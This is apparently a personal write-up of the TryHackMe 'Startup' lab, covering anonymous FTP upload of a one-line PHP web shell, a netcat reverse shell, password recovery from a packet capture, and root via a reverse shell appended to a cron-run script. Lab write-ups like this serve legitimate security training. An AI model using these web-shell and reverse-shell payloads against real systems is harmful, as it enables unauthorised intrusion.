THM: Startup
Introduction
We are Spice Hut, a new startup company that just made it big! We offer a variety of spices and club sandwiches (incase you get hungry), but that is not why you are here. To be truthful, we aren’t sure if our developers know what they are doing and our security concerns are rising. We ask that you preform a thorough penetration test and try to own root. Good luck!.
This is Startup from TryHackMe. It’s easy rated but I could use a win, okay?
Ports
FTP, SSH and HTTP - all on their standard ports.
FTP
FTP has anonymous access, and most importantly there is a subdirectory inside the FTP root directory called ftp which is writeable.
I use this to upload a basic PHP executor - the content is just:
<?php system($_GET['cmd']);?>
And I call it cmd.phtml.
HTTP
On the webserver we can find our file at http://10.10.4.167/files/ftp/ and then we can execute commands:
http://10.10.4.167/files/ftp/cmd.phtml?cmd=id
I get a reverse shell with Burp and pentestmonkey:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
www-data
Through some enumeration we find a directory called /incidents and within that is a packet capture file. The easy exfiltration method is to copy it to the webserver:
www-data@startup:/incidents$ cp suspicious.pcapng /var/www/html/files/ftp/pcap.pcapng
From there we can download it and open it with wireshark.
Trawling through the pcap, we can find where someone else has gotten a shell on the box:
So now we have a password. We do have another user that looks interesting: lennie. Sure enough, we can su lennie with the password from the packet capture.
Lennie
Lennie can’t run sudo, but he has some root owned stuff:
What do these do? Let’s look one at a time.
planner.sh
startup_list.txt
It’s empty
/etc/print.sh
Okay, so what do we have? The planner.sh script echoes the variable LIST into the startup_list file and then calls /etc/print.sh, which echoes the text Done!. How can we use this?
If we watch the directory for a little bit, we can see the startup_list.txt timestamp changes every minute. So there is a cron job running that calls planner.sh every minute. So let’s add a line to the /etc/print.sh file:
lennie@startup:~/scripts$ printf "bash -i >& /dev/tcp/10.9.10.123/1235 0>&1\n" >> /etc/print.sh
And start a new listener …
Yes it was ‘easy’ but hey a win’s a win. Thanks r1gormort1s.